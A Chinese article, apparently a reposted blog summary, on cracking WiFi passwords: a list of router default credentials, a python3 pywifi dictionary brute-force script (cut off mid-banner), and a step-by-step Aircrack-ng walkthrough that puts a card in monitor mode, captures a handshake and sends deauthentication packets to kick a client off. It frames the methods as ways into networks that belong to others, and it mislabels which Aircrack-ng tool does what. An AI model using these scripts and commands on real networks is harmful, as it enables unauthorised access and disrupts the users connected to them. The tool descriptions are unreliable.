wifi破解方法总结(精华) 您所在的位置:网站首页 如何接入有密码的wifi wifi破解方法总结(精华)

wifi破解方法总结(精华)

2024-01-26 09:34| 来源: 网络整理| 查看: 265

目录

方法一:默认密码大猜想

方法二:推荐使用“wifi万能钥匙”

方法三:抓不到握手包的情况下,使用网卡爆破(用字典和wifi密码碰撞)

下面是python3脚本

方法四:可以抓到握手包的情况下,hash碰撞爆破

实验一:使用Aircrack-ng套件抓包和破解wifi

1. 第一步 airmon-ng列出网卡信息

2. 第二步 airmon-ng start wlan0 开启网卡监控

3. 第三步 airodump-ng wlan0mon 扫描wifi信号

4. 第四步 airodump-ng 抓取握手包

5. 第五步 aireplay-ng 强制用户断开wifi重连

6. 第六步 使用密码字典,破解握手包

方法五:针对有wps功能的路由器,使用PIN码破解

实验二: 使用Wash破解开启了WPS功能的路由器

方法六:利用一些漏洞

最后:无线WiFi网络的密码破解攻防及原理

一、 WiFi的加密方式

1、WEP(有线等效加密)(很容易被破解)

2、WPA-PSK(TKIP)(安全性较高,但是也可以被破解)

3、WPA2-PSK(AES)(安全性较高,破解难度有所增加)

4、WPA-PSK(TKIP)+WPA2-PSK(AES)

二,WiFi的破解方法

1、WiFi万能钥匙

2、暴力破解的原理

3、pin码破解WiFi密码

方法一:默认密码大猜想

  以下为常见路由器默认密码(一些新手新买的路由器一般嫌麻烦都不会修改密码哦)

  品牌:ViKing用户名:adsl 密码:adsl1234  品牌:实达默认IP:192.168.10.1版本:  用户名:admin 密码:conexant  版本:2110ehr v4.5用户名:root 密码:grouter  用户名:admin 密码:starnetadsl  品牌:艾玛默认IP:192.168.101.1用户名:admin 密码:admin  品牌:神州数码/华硕用户名:adsl 密码:adsl1234  品牌:全向用户名:root 密码:root  品牌:普天用户名:putian 密码:123456  品牌:e-tek用户名:admin 密码:12345  品牌:zyxel用户名:anonymous密码:1234  品牌:北电用户名:anonymous 密码:1234  品牌:大恒用户名:admin 密码:admi  品牌:大唐用户名:admin 密码:1234  品牌:斯威特用户名:root 密码:root  用户名:user 密码:user  品牌:中兴用户名:adsl 密码:adsl831  品牌:BENQ用户名:user 密码:benq1234  品牌:华硕用户名:ADSL 密码:adsl1234  腾达192.168.0.1 admin / admin  用户名:admin 密码:admin方法二:推荐使用“wifi万能钥匙”

  当然,wifi万能钥匙并不是万能的,其原理而是将已知得免费公共wifi热点的资源集中在一起,如果当你所在的地方搜索到 wifi万能钥匙数据库的wifi后便自动连接。它并不能让你进入别人加密的wifi。如果以前进入过某个wifi,现在又无法进入,那么可能是以前 wifi的所有者并没有加密,现在加密了,或者密码被修改了!

但——WiFi万能钥匙”类App的真正原理是,收集用户手机上成功连接过的WiFi账号和密码,并上传、存储到App的服务器上,等到附近的蹭网者搜索到同一个网络时,该App就可以根据附近热点的配置信息,从服务器上自动匹配并取得相应的密码,通过数据流量发送到手机端,从而完成WiFi连网。

方法三:抓不到握手包的情况下,使用网卡爆破(用字典和wifi密码碰撞) 下面是python3脚本 #!/usr/bin/env python# -*- coding:utf-8 -*-# author:Eli# software: PyCharmimport pywififrom pywifi import const # 引用一些定义import timedef getwifi(): wifi = pywifi.PyWiFi() # 抓取网卡接口 ifaces = wifi.interfaces()[0] # 获取网卡 ifaces.scan() bessis = ifaces.scan_results() list = [] for data in bessis: list.append((data.ssid, data.signal)) return len(list), sorted(list, key=lambda st: st[1], reverse=True)def getsignal(): while True: n, data = getwifi() time.sleep(1) if n != 0: return data[0:10]def ssidnamelist(): ssidlist = getsignal() namelist = [] for item in ssidlist: namelist.append(item[0]) return namelistdef try_connect(ssidname, password): wifi = pywifi.PyWiFi() # 抓取网卡接口 ifaces = wifi.interfaces()[0] # 获取网卡 ifaces.disconnect() # 断开无限网卡连接 profile = pywifi.Profile() # 创建wifi连接文件 profile.ssid = ssidname # 定义wifissid profile.auth = const.AUTH_ALG_OPEN # 网卡的开放 profile.akm.append(const.AKM_TYPE_WPA2PSK) # wifi加密算法 profile.cipher = const.CIPHER_TYPE_CCMP ##加密单元 profile.key = password # wifi密码 ifaces.remove_all_network_profiles() # 删除其他所有配置文件 tmp_profile = ifaces.add_network_profile(profile) # 加载配置文件 ifaces.connect(tmp_profile) # 连接wifi time.sleep(5) # 5秒后看能否连接上 if ifaces.status() == const.IFACE_CONNECTED: print("[-]WiFi connection success!") else: print("[-]WiFi connection failure!") ifaces.disconnect() # 断开连接 time.sleep(1) return Truedef main(): print(" ____ _ __ _____ _____ ___ ") print(" / ___|_ __ __ _ ___| | _/ / / /_ _| ___|_ _|") print("| | | "__/ _` |/ __| |/ // / // / / | || |_ | | ") print("| |___| | | (_| | (__|

方法四:可以抓到握手包的情况下,hash碰撞爆破

现在广泛使用的wpa和wpa2协议,不能说100%破解了,破解的具体步骤是:

取消认证攻击——重连时抓握手包——离线破解密码

先通过取消认证攻击使当前活跃设备与目标wifi断开连接,然后设备一般会自动重连,重连过程中会发送带有加密后的wifi密文的握手包,通过嗅探工具将握手包下载到本地,就可以在本地离线破解wifi密码。

支持离线破解,大概是类似web渗透中的抓回密码的哈希值,哈希虽不可逆,不能直接算出明文密码,但可以将一大堆明文密码采用同样的哈希算法加密去逐一匹配碰撞,本质也是暴力破解。但和文章开头讲到的爆破的区别是:一个使用网卡爆破,一个是使用cpu爆破,速度上要快近亿倍。 网上有一些在线hash破解网站,可以根据需要上传hash。如果他们的数据库里没有你的hash,也许等一些天后你的hash密码就被破解出来了呢!

普通的无线路由器,加密方法一般使用wpa 、wpa2或wep,wep因为太不安全极易被破解在现行的无线路由器上已基本取消。所以我们搜索到的待破WiFi基本都是wpa或wpa2加密的。至于使用认证服务器(如radius等)的wpa认证在个人无线WiFi领域基本不可能,所以通常我们能搜索到的待破WiFi都是基于本地密码的wpa或wpa2加密WiFi。

实验一:使用Aircrack-ng套件抓包和破解wifi

Aircrack-ng套件:

airmon-ng(监听流量)、airodump-ng(抓无线握手包)、aircrack-ng(强制用户断开认证)、aireplay-ng(破解密码)

1. 第一步 airmon-ng列出网卡信息

也可以使用 iwconfig 查看 无线网卡工作状态

我这里测试使用的是无线网卡wlan0。 自己的网卡是Qualcomm xxxx不知道为什么扫描不到wifi信号,只能买了一个网卡。。。

2. 第二步 airmon-ng start wlan0 开启网卡监控

如果启动失败,可以尝试先清理一下阻碍的进程,运行如下命令后重新输入开启监控的命令

airmon-ng check killairmon-ng stop wlan0mon #可以关闭网卡监控模式

可以使用ifconfig命令查看一下网卡信息,网卡的名字已经变了——wlan0mon。

网卡wlan0后面增加了mon(monitor),说明wlan0监听模式启动成功。

3. 第三步 airodump-ng wlan0mon 扫描wifi信号

按Q或者【Ctrl+ C】可以退出并停止扫描。

 

这里我用自己家的wifi做实验【CMCC-FNgH】

参数介绍:?????????????????、

4. 第四步 airodump-ng 抓取握手包

上图获取wifi信息如下:

BSSID是——   8C:8F:8B:D2:F0:26 信道(CH)是——  8

输入:

airodump-ng -c 8 -w wificap.cap --bssid 8C:8F:8B:D2:F0:26 wlan0mon

-c:指定信道 -w:指定抓去握手包的存放位置或者名字,wificap.cap 是一会抓去的握手包的名字 –bssid:指定路由器的MAC

 当看到这个界面就表示正在抓取握手包了。

这里的STATION下的 9C:BC:F0:D1:65:8A 就是正在使用这个wifi的客户端(手机、电脑等)

5. 第五步 aireplay-ng 强制用户断开wifi重连

再开一个终端输入命令:

aireplay-ng -0 10 -a 路由器MAC -c 客户机MAC wlan0mon

`aireplay-ng -0 10 -a 8C:8F:8B:D2:F0:26 -c 9C:BC:F0:D1:65:8A wlan0mon`

使用airplay-ng工具强制断开已经连接到wifi的设备断开



【本文地址】

公司简介

联系我们

今日新闻

    推荐新闻

    专题文章
      CopyRight 2018-2019 实验室设备网 版权所有